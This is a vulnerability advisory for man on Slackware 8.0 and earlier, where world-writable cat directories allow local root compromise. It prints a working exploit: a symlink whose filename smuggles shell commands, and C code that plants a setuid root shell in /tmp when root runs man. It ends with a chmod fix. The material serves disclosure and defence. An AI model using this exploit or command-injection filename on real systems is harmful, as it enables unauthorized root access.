COMMAND

    /usr/bin/man

SYSTEMS AFFECTED

    Slackware 8.0 and before

PROBLEM

    Josh Lockdown and  zen-parse found following.   Slackware 8.0  and
    previous  issues  of  Slackware  are  released with /var/man/cat*/
    chmod 1777:

        drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

    Since these directories are world writeable we can create symlinks
    there like so:

    `ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.  ;script;man.7"
    /var/man/cat7/man.7.gz`

    When  `/usr/bin/man  man`  is  executed  by  root,  it will create
    /var/man/cat7/man.1.gz.  The symlink forces it to create a file in
    /usr/man/man7 named:

        /usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.; script;man.7.gz."

    /usr/bin/man will then execute /tmp/script which contains:

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/wait.h>
    #include <errno.h>
    
    int main()
    {
      FILE *fil;
      mode_t perm = 06711;
    
      if(!getuid()) {
        fil = fopen("/tmp/bleh.c","w");
        fprintf(fil,"%s\n","#include <unistd.h>");
        fprintf(fil,"%s\n","#include <stdio.h>");
        fprintf(fil,"%s\n","int main() {");
        fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
        fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
        fprintf(fil,"%s\n","return 0; }");
        fclose(fil);
        system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
        unlink("/tmp/bleh.c");
        chmod("/tmp/bleh", perm);
      }
       execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
       return 0;
    }

    With the above code compiled  in /tmp/script, if root were  to run
    `man man`, a suid shell would be left in /tmp/bleh.

SOLUTION

    Temporary Fix:

        chmod 700 /var/man/cat*